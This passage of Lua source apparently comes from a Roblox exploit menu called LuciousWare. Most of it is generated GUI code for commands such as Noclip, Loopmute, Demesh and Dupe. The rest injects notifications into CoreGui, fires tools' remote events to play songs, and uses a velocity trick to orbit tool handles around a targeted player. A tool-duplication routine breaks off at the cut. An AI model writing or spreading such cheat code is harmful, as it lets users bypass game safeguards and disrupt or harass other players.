TextLabel_17.Font = Enum.Font.SourceSans TextLabel_17.Text = "Mute" TextLabel_17.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_17.TextSize = 18.000 TextLabel_18.Parent = CommandsFrame TextLabel_18.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_18.BackgroundTransparency = 1.000 TextLabel_18.Position = UDim2.new(0, 0, 0.070652172, 0) TextLabel_18.Size = UDim2.new(0, 147, 0, 34) TextLabel_18.ZIndex = 0 TextLabel_18.Font = Enum.Font.SourceSans TextLabel_18.Text = "Loopmute" TextLabel_18.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_18.TextSize = 18.000 TextLabel_19.Parent = CommandsFrame TextLabel_19.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_19.BackgroundTransparency = 1.000 TextLabel_19.Position = UDim2.new(0, 0, 0.201086953, 0) TextLabel_19.Size = UDim2.new(0, 147, 0, 34) TextLabel_19.ZIndex = 0 TextLabel_19.Font = Enum.Font.SourceSans TextLabel_19.Text = "Unmute" TextLabel_19.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_19.TextSize = 18.000 TextLabel_20.Parent = CommandsFrame TextLabel_20.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_20.BackgroundTransparency = 1.000 TextLabel_20.Position = UDim2.new(0, 0, 0.336956531, 0) TextLabel_20.Size = UDim2.new(0, 147, 0, 34) TextLabel_20.ZIndex = 0 TextLabel_20.Font = Enum.Font.SourceSans TextLabel_20.Text = "Unloopmute" TextLabel_20.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_20.TextSize = 18.000 TextLabel_21.Parent = CommandsFrame TextLabel_21.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_21.BackgroundTransparency = 1.000 TextLabel_21.Position = UDim2.new(0, 0, 0.472826093, 0) TextLabel_21.Size = UDim2.new(0, 147, 0, 34) TextLabel_21.ZIndex = 0 TextLabel_21.Font = Enum.Font.SourceSans TextLabel_21.Text = "Noclip" TextLabel_21.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_21.TextSize = 18.000 TextLabel_22.Parent = CommandsFrame TextLabel_22.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_22.BackgroundTransparency = 1.000 TextLabel_22.Position = UDim2.new(0, 0, 0.586956501, 0) TextLabel_22.Size = UDim2.new(0, 147, 0, 34) TextLabel_22.ZIndex = 0 TextLabel_22.Font = Enum.Font.SourceSans TextLabel_22.Text = "Clip" TextLabel_22.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_22.TextSize = 18.000 TextLabel_23.Parent = CommandsFrame TextLabel_23.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_23.BackgroundTransparency = 1.000 TextLabel_23.Position = UDim2.new(0, 0, 0.690217376, 0) TextLabel_23.Size = UDim2.new(0, 147, 0, 34) TextLabel_23.ZIndex = 0 TextLabel_23.Font = Enum.Font.SourceSans TextLabel_23.Text = "Rejoin" TextLabel_23.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_23.TextSize = 18.000 TextLabel_24.Parent = CommandsFrame TextLabel_24.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_24.BackgroundTransparency = 1.000 TextLabel_24.Position = UDim2.new(0, 0, 0.804347813, 0) TextLabel_24.Size = UDim2.new(0, 147, 0, 34) TextLabel_24.ZIndex = 0 TextLabel_24.Font = Enum.Font.SourceSans TextLabel_24.Text = "Demesh" TextLabel_24.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_24.TextSize = 18.000 TextLabel_25.Parent = Frame3 TextLabel_25.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_25.BackgroundTransparency = 1.000 TextLabel_25.Position = UDim2.new(0.108235292, 0, 0.084712714, 0) TextLabel_25.Size = UDim2.new(0, 98, 0, 19) TextLabel_25.Font = Enum.Font.GothamSemibold TextLabel_25.Text = "Commands" TextLabel_25.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_25.TextSize = 18.000 Notification.Name = "Notification" Notification.Parent = UI Notification.ZIndexBehavior = Enum.ZIndexBehavior.Sibling MainFrame.Name = "Main-Frame" MainFrame.Parent = Notification MainFrame.BackgroundColor3 = Color3.fromRGB(36, 40, 72) MainFrame.BorderColor3 = Color3.fromRGB(29, 29, 34) MainFrame.ClipsDescendants = true MainFrame.Position = UDim2.new(0.870999992, 0, 0.69599998, 0) MainFrame.Size = UDim2.new(0.165738657, 0, 0.169698313, 0) MainFrame.ImageColor3 = Color3.fromRGB(85, 85, 255) MainFrame.ScaleType = Enum.ScaleType.Slice MainFrame.SliceCenter = Rect.new(100, 100, 100, 100) TextBox_2.Parent = MainFrame TextBox_2.Active = false TextBox_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox_2.BackgroundTransparency = 1.000 TextBox_2.Position = UDim2.new(0.0411543176, 0, 0.261852324, 0) TextBox_2.Size = UDim2.new(0.732022762, 1, 0.673187912, 0) TextBox_2.ZIndex = 3 TextBox_2.ClearTextOnFocus = false TextBox_2.Font = Enum.Font.Gotham TextBox_2.Text = "LuciousWare Notify" TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_2.TextScaled = true TextBox_2.TextSize = 20.000 TextBox_2.TextWrapped = true UITextSizeConstraint.Parent = TextBox_2 UITextSizeConstraint.MinTextSize = 15 Frame.Parent = MainFrame Frame.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame.Position = UDim2.new(0.0309416335, 0, -0.0444677845, 0) Frame.Size = UDim2.new(0, 176, 0, 31) UICorner_37.Parent = Frame TextLabel_26.Parent = Frame TextLabel_26.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_26.BackgroundTransparency = 1.000 TextLabel_26.Position = UDim2.new(0.249373391, 0, 0.129032254, 0) TextLabel_26.Size = UDim2.new(0, 100, 0, 29) TextLabel_26.Font = Enum.Font.GothamSemibold TextLabel_26.Text = "LUCIOUSWARE" TextLabel_26.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_26.TextSize = 14.000 ImageLabel_2.Parent = Frame ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_2.BackgroundTransparency = 1.000 ImageLabel_2.Position = UDim2.new(0.0547787994, 0, 0.240143359, 0) ImageLabel_2.Size = UDim2.new(0, 22, 0, 21) ImageLabel_2.Image = "rbxassetid://7072706001" UICorner_38.Parent = MainFrame -- Scripts: local Main, Notification, Control, G, RL = UI['Main'], UI['Notification'], Color3.fromRGB(217,60,56), getgenv or function() return _G end, true local CBackground, CImage, CText, CScroll = {}, {}, {}, {} local Cast = { BackgroundColor3 = CBackground; ImageColor3 = CImage; TextColor3 = CText; ScrollBarImageColor3 = CScroll; } Notification['Parent'] = game:GetService('CorePackages'); Notification['Main-Frame'].Position = UDim2.new(1.036,0,.753,0) local Tween = function(Obj,Time,Style,Direction,Table) game:GetService('TweenService'):Create(Obj,TweenInfo.new(Time,Enum.EasingStyle[Style],Enum.EasingDirection[Direction],0,false,0),Table):Play() end local Push = Instance.new('BindableEvent') local Notify = function(Text,Duration) Duration = Duration or 4 coroutine.wrap(function() local Clone = Notification:Clone(); local Frame = Clone['Main-Frame']; Clone['Parent'] = game:GetService('CoreGui'); Frame['TextBox'].Text = Text Push:Fire() local Event = Push['Event']:Connect(function() Tween(Frame,.4,'Quad','InOut',{Position = Frame['Position'] + UDim2.new(0,0,-.121,0)}) end) Tween(Frame,.4,'Quad','InOut',{Position = UDim2.new(.8707,0,.753,0)}); wait(Duration + .4); Tween(Frame,.4,'Quad','InOut',{Position = UDim2.new(1.036,0,.753,0)}); wait(.4) Clone:Destroy(); Event:Disconnect() end)() end coroutine.wrap(function() wait(1.6) game:GetService('UserInputService')['InputBegan']:Wait() Notify('LUCIOUSWARE Successfully Loaded!.',4) end)() local function BSYZ_fake_script() -- Home.HomeScript local script = Instance.new('LocalScript', Home) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame2:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame2.Visible = false script.Parent.Parent.Scripts:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Scripts.Visible = false end) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame1.Visible = true wait(0.2) script.Parent.Parent.Parent.Frames.Frame1:TweenPosition(UDim2.new(0, 0,0, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.LogFrame:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.LogFrame.Visible = false end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.Frame3:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame3.Visible = false end) -- Line Bar -- script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line1:TweenPosition(UDim2.new(0.582, 0,0.325, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line2:TweenPosition(UDim2.new(1.582, 0,0.468, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line3:TweenPosition(UDim2.new(1.582, 0,0.608, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line4:TweenPosition(UDim2.new(1.582, 0,0.754, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) end coroutine.wrap(BSYZ_fake_script)() local function BRXLGPL_fake_script() -- Visualizer.VisScript local script = Instance.new('LocalScript', Visualizer) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame1:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame1.Visible = false script.Parent.Parent.Scripts:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Scripts.Visible = false end) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame2.Visible = true wait(0.2) script.Parent.Parent.Parent.Frames.Frame2:TweenPosition(UDim2.new(0, 0,0, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.PlayersFrame:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.PlayersFrame.Visible = false end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.LogFrame:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.LogFrame.Visible = false end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.Frame3:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame3.Visible = false end) -- Line Bar -- script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line1:TweenPosition(UDim2.new(1.582, 0,0.325, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line2:TweenPosition(UDim2.new(0.582, 0,0.468, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line3:TweenPosition(UDim2.new(1.582, 0,0.608, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line4:TweenPosition(UDim2.new(1.582, 0,0.754, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) end coroutine.wrap(BRXLGPL_fake_script)() local function JLJN_fake_script() -- logger.LoggerScript local script = Instance.new('LocalScript', logger) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame2:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame2.Visible = false script.Parent.Parent.Scripts:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Scripts.Visible = false end) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.LogFrame.Visible = true wait(0.2) script.Parent.Parent.Parent.Frames.LogFrame:TweenPosition(UDim2.new(0, 0,0, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.Frame1:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame1.Visible = false end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.Frame3:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame3.Visible = false end) -- Line Bar -- script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line1:TweenPosition(UDim2.new(1.582, 0,0.325, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line2:TweenPosition(UDim2.new(1.582, 0,0.468, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line3:TweenPosition(UDim2.new(0.582, 0,0.608, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line4:TweenPosition(UDim2.new(1.582, 0,0.754, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) end coroutine.wrap(JLJN_fake_script)() local function RJYSCL_fake_script() -- Settings.SettingsScript local script = Instance.new('LocalScript', Settings) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame2:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame2.Visible = false script.Parent.Parent.Scripts:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Scripts.Visible = false end) script.Parent.MouseButton1Down:Connect(function() script.Parent.Parent.Parent.Frames.Frame3.Visible = true wait(0.2) script.Parent.Parent.Parent.Frames.Frame3:TweenPosition(UDim2.new(0, 0,0, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.LogFrame:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.LogFrame.Visible = false end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Parent.Frames.Frame1:TweenPosition(UDim2.new(0.001, 0,-1, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) wait(0.3) script.Parent.Parent.Parent.Frames.Frame1.Visible = false end) -- Line Bar -- script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line1:TweenPosition(UDim2.new(1.582, 0,0.325, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line2:TweenPosition(UDim2.new(1.582, 0,0.468, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line3:TweenPosition(UDim2.new(1.582, 0,0.608, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) script.Parent.MouseButton1Click:Connect(function() script.Parent.Parent.Line4:TweenPosition(UDim2.new(0.582, 0,0.754, 0),Enum.EasingDirection.In,Enum.EasingStyle.Sine,0.3,true) end) end coroutine.wrap(RJYSCL_fake_script)() local function YRLBCY_fake_script() -- plricon.LocalScript local script = Instance.new('LocalScript', plricon) local Players = game:GetService("Players") local player = Players.LocalPlayer -- Fetch the thumbnail local userId = player.UserId local thumbType = Enum.ThumbnailType.HeadShot local thumbSize = Enum.ThumbnailSize.Size420x420 local content, isReady = Players:GetUserThumbnailAsync(userId, thumbType, thumbSize) -- Set the ImageLabel's content to the user thumbnail local imageLabel = script.Parent imageLabel.Image = content imageLabel.Size = UDim2.new(0, 31,0, 31) end coroutine.wrap(YRLBCY_fake_script)() local function BHBDOI_fake_script() -- Name.LocalScript local script = Instance.new('LocalScript', Name) script.Parent.Text = game:GetService("Players").LocalPlayer.Name end coroutine.wrap(BHBDOI_fake_script)() local function CUOU_fake_script() -- Distance.LocalScript local script = Instance.new('LocalScript', Distance) _G[script.Parent.Name]=5 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(CUOU_fake_script)() local function SDGJ_fake_script() -- Visualizee.VisualizerScript local script = Instance.new('LocalScript', Visualizee) local currentid="" local currentconnection=nil local vis = nil local dt =0 local CurrentSound=nil local CurrentTimePosition=0 game:service'RunService'.Stepped:Connect(function(e,d) dt+=d end) local dont=1 function setupadded() game:GetService("Players").LocalPlayer.Character.ChildAdded:Connect(function(child) if child:IsA("Tool") and dont ==0 then wait() child.Parent=game:GetService("Players").LocalPlayer.Backpack wait(.3) dont=1 if vis ~=nil then vis(currentid,CurrentTimePosition) end end end) end setupadded() vis=function(id,timepos) _G.tov={} if _G.NetFix==nil then _G.NetFix=" " game:service'RunService'.Heartbeat:Connect(function() for i,v in pairs(_G.tov) do v[1].Velocity=Vector3.new(2e2,0,0) v[1].CFrame=v[2].CFrame end end) end local Stopped=false local visstuff={} local function align(i) l=Instance.new("Part") l.Transparency=1 l.Parent=i.Parent l.Size=Vector3.new(0,0,0) l.Name="" l.CanCollide=false l.Anchored=true l.CFrame=i.CFrame table.insert(_G.tov,{i,l}) local att0 = Instance.new("Attachment", i) att0.Position = Vector3.new(0,0,0) local att1 = Instance.new("Attachment", l) att1.Position = Vector3.new(0,0,0) local AP = Instance.new("AlignPosition", i) AP.Attachment0 = att0 AP.Attachment1 = att1 AP.RigidityEnabled = true AP.ReactionForceEnabled = false AP.ApplyAtCenterOfMass = true AP.MaxForce = 9999999 AP.MaxVelocity = math.huge AP.Responsiveness = responsiveness local AO = Instance.new("AlignOrientation", i) AO.Attachment0 = att0 AO.Attachment1 = att1 AO.ReactionTorqueEnabled = false AO.PrimaryAxisOnly = false AO.MaxTorque = 9999999 AO.MaxAngularVelocity = math.huge AO.Responsiveness = responsiveness table.insert(visstuff,{AO,AP,att0,att1,l}) return l end local Visualizer={} local First=false local Handles={} local ToolCount=0 for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") then ToolCount=ToolCount+1 end end local cf=workspace[_G.target].HumanoidRootPart.CFrame for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") then coroutine.wrap(function() if First==false then First=v end local Handle=v:FindFirstChildOfClass("Part") v.Parent=game:GetService("Players").LocalPlayer.Character if Handle:FindFirstChildOfClass("Sound") then Handle:FindFirstChildOfClass("Sound").Parent=Instance.new("Part") end currentid=id v:FindFirstChildOfClass("RemoteEvent"):FireServer("PlaySong",(id)) repeat wait() until Handle:FindFirstChildOfClass("Sound") and Handle:FindFirstChildOfClass("Sound").IsPlaying for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do if v.Name=="RightGrip" then v:Destroy() end end Handle.Name="" if First==v then CurrentSound=Handle:FindFirstChildOfClass("Sound") end Handle:FindFirstChildOfClass("Sound").Playing=false coroutine.wrap(function() repeat wait() until v.Parent~=game:GetService("Players").LocalPlayer.Character Handle.Name="Handle" Stopped=true dont=1 _G.tov={} for i,v in pairs(visstuff) do for i,v in pairs(v) do v:Destroy() end end end)() table.insert(Handles,Handle) table.insert(Visualizer,align(Handle)) end)() end end local Root=workspace[_G.target].HumanoidRootPart game:GetService("RunService").Heartbeat:Connect(function() Root=workspace[_G.target].HumanoidRootPart end) repeat wait() until #Visualizer==ToolCount and CurrentSound wait(1) for i,v in pairs(Handles) do coroutine.wrap(function() v:FindFirstChildOfClass("Sound").TimePosition=timepos v:FindFirstChildOfClass("Sound").Playing=true end)() end spawn(function() while wait(.6) do if Stopped == true then break end if CurrentSound.IsPlaying == true then CurrentTimePosition=CurrentSound.TimePosition end end end) local RenderStepped = game:GetService('RunService').RenderStepped local Wait = RenderStepped.Wait local Selected=CurrentSound local p = Instance.new("Part") function CF2V(cf) p.CFrame=cf return p.Rotation end local RenderStepped = game:GetService('RunService').RenderStepped local Wait = RenderStepped.Wait local Selected=CurrentSound local p = Instance.new("Part") function CF2V(cf) p.CFrame=cf return p.Rotation end local function AngleFromSettings(angle,str) if str=="X" then return CFrame.Angles(0,angle,0) elseif str=="Y" then return CFrame.Angles(angle,0,0) elseif str=="Z" then return CFrame.Angles(math.sin(tick()/2)*15,angle,0) elseif str=="8" then return CFrame.Angles(angle,angle,angle) end end local function VectorFromSettings(angle,str) if str=="X" then return Vector3.new(angle,0,0) elseif str=="Y" then return Vector3.new(0,angle,0) elseif str=="Z" then return Vector3.new(0,0,angle) elseif str=="UP" then return Vector3.new(angle,5,0) end end dont=0 setupadded() for K,V in next, Visualizer do coroutine.wrap(function() repeat local Spin = 20 repeat if CurrentSound then local responsiveness = script.Parent.Parent.Responsiveness.Text local bass = script.Parent.Parent.Bass.Text local wavee = script.Parent.Parent.WaveCount.Text local Volume = CurrentSound['PlaybackLoudness'] local Iterator=math.rad(Spin+(K*(360/#Visualizer))) local Z = _G.Distance + Volume / (1 ~= bass and (bass - 1) or .01) local G = Volume / (responsiveness ~= 35 and (responsiveness - 35) or .01) local P = CFrame.new(Root['Position']) * AngleFromSettings(Iterator,_G.VisAngle) * CFrame.new(0,0,Z) local AddVector =Vector3.new(0,0,0) if _G.WavesOn == "On" then AddVector=VectorFromSettings(math.rad((((dt*_G.WaveInt)+(K/#Visualizer)*(math.pi*wavee)))),_G.WavesAngle) end V['Position'] = P.p+AddVector V['Rotation'] = CF2V(CFrame.new(V.Position, Root['Position'] + Vector3.new(0, G, 0))) end Spin+=_G.Speed game:service'RunService'.RenderStepped:Wait() until Stopped or ((Spin >= 360)) until Stopped Notify("Visualizer Stopped") ccc:Disconnect() end)() end end script.Parent.MouseButton1Click:Connect(function() vis(script.Parent.Parent.AudioId.Text:gsub("%D+", ""),0) end) end coroutine.wrap(SDGJ_fake_script)() local function MXDP_fake_script() -- Sync.LocalScript local script = Instance.new('LocalScript', Sync) script.Parent.MouseButton1Click:Connect(function() print(pcall(function() for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Tool") and v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound") then coroutine.wrap(function() v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").Playing=false wait() v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").TimePosition=0 v:FindFirstChildOfClass("Part"):FindFirstChildOfClass("Sound").Playing=true end)() end end end)) end) end coroutine.wrap(MXDP_fake_script)() local function CXJT_fake_script() -- TpInput.LocalScript local script = Instance.new('LocalScript', TpInput) local Player = game:GetService("Players").LocalPlayer local TpInput = script.Parent.Parent["TpInput "] TpInput.FocusLost:connect(function() for i, v in pairs(Player.Character:GetDescendants()) do if v:IsA("Sound") then v.TimePosition = tonumber(TpInput.Text) end end wait(1) TpInput.Text = "" end) for i, v in pairs(Player.Character:GetDescendants()) do if v:IsA("Tool") then v.Unequipped:connect(function() pcall(function() wait() end) end) end end end coroutine.wrap(CXJT_fake_script)() local function XTZOA_fake_script() -- WavesOn.LocalScript local script = Instance.new('LocalScript', WavesOn) script.Parent.MouseButton1Click:Connect(function() if "Waves".._G.WavesOn==script.Parent.Name then _G.WavesOn="Off" else _G.WavesOn="On" end end) while wait() do if script.Parent.Name=="Waves"..tostring(_G.WavesOn) then script.Parent.BackgroundColor3=Color3.fromRGB(114, 129, 230) else script.Parent.BackgroundColor3=Color3.fromRGB(90, 90, 90) end end end coroutine.wrap(XTZOA_fake_script)() local function UPARX_fake_script() -- MA8.LocalScript local script = Instance.new('LocalScript', MA8) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(UPARX_fake_script)() local function BYHG_fake_script() -- MAZ.LocalScript local script = Instance.new('LocalScript', MAZ) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(BYHG_fake_script)() local function WTDUU_fake_script() -- MAX.LocalScript local script = Instance.new('LocalScript', MAX) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(WTDUU_fake_script)() local function KFETEL_fake_script() -- MAY.LocalScript local script = Instance.new('LocalScript', MAY) script.Parent.MouseButton1Click:Connect(function() _G.VisAngle=script.Parent.Name:gsub("MA","") end) while wait() do if script.Parent.Name=="MA"..tostring(_G.VisAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(KFETEL_fake_script)() local function TRFBLUX_fake_script() -- WAUP.LocalScript local script = Instance.new('LocalScript', WAUP) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(TRFBLUX_fake_script)() local function NECW_fake_script() -- WAX.LocalScript local script = Instance.new('LocalScript', WAX) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(NECW_fake_script)() local function PHIY_fake_script() -- WAZ.LocalScript local script = Instance.new('LocalScript', WAZ) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(PHIY_fake_script)() local function FIHTN_fake_script() -- WAY.LocalScript local script = Instance.new('LocalScript', WAY) script.Parent.MouseButton1Click:Connect(function() _G.WavesAngle=script.Parent.Name:gsub("WA","") end) while wait() do if script.Parent.Name=="WA"..tostring(_G.WavesAngle) then script.Parent.BackgroundTransparency=0 script.Parent.TextColor3=Color3.fromRGB(53, 53, 53) else script.Parent.BackgroundTransparency=1 script.Parent.TextColor3=Color3.fromRGB(255,255,255) end end end coroutine.wrap(FIHTN_fake_script)() local function ODDE_fake_script() -- Dupe.LocalScript local script = Instance.new('LocalScript', Dupe) script.Parent.MouseButton1Click:Connect(function() for i=1,tonumber(script.Parent.Parent.Amount.Text) or 1 do 